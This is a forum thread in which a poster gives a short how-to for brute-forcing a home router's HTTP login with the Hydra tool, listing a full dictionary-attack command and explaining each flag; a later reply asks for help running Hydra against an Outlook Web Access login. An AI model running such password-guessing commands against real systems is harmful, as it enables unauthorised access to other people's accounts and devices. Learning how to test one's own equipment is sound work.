|
|||||||
| Specialist Topics Suggestions for topic sections welcome! |
![]() |
|
|
LinkBack | Thread Tools | Display Modes |
|
||||
|
Hey all!
A (very) short video on how to crack your routers password! What is this? A basic guide on how to use hydra to crack a http password on your home router. How does this work? > Uses a dictionary attack to test for weak or simple passwords on one or more remote clients > Supports multiple protocol What do I need? > Hydra > Big dictionary. Commands: hydra -l admin -P /pentest/passwords/wordlists/g0tmi1k.lst -e ns -t 15 -f -s -vV 192.168.1.1 http-get / -l = username-P = password (Looks for a wordlist cos its a 'big' P) -e ns = checks for 'null' password -t xx= How many tasks to run at once -f = exit once it finds the first user/password -s = connect via SSL -vV = verbose mode (shows more info) 192.168.1.1 = IP address http-get = what to crack/method etc / = Page to crack - root Notes: This is cut from my final video called "g0tmi1k's home network". The password HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being crack is next to nothing! Links Download: 2 - hydra.mp4 - g0tmi1k Video: How to: Crack HTTP Idea/Source(s): xHydra Misc : Dictionaries Software Name: Hydra Version: 5.4 Home Page: #!/bin/the hacker's choice - THC Download Link: The Hacker's Choice Download ~g0tmi1k
__________________
~ Have you, g0tmi1k? ~
<(^^,)> d[-_^]b (= =D-->--< ![]() Last edited by g0tmi1k; 07-05-2009 at 11:05 AM. |
|
|||
|
Nice easy howto for the newcomers. Win.
Also kudos for making the video in something other than Flash. I'm sure I'm not the only one who refuses to install Flash under Windows. FYI for the win32 version there's a lazy man's GUI here (GeoGen Hydra GUI) w w w.geogensoft.com/products/geogen-hydra-gui.html Cheeky pricks want $15 for a frontend to an opensource tool though. Last edited by thrasher12ga; 08-18-2009 at 02:42 AM. Reason: Flash is Fail |
|
|||
|
I would like to test our outlook web access (owa) but every time I run hydra I get "cannot resolve xx.xx.xx.xx"?
My command is (this is using the windows version... sorry) hydra -L login.txt -P pass.txt -V service https xx.xxx.xxx.xxx https-get /exchange Any ideas??? |
|
|||
|
Quote:
|
|
|||
|
Quote:
Thanks |
![]() |
| Bookmarks |
| Tags |
| http hydra router g0tmi1k |
| Thread Tools | |
| Display Modes | |
|
|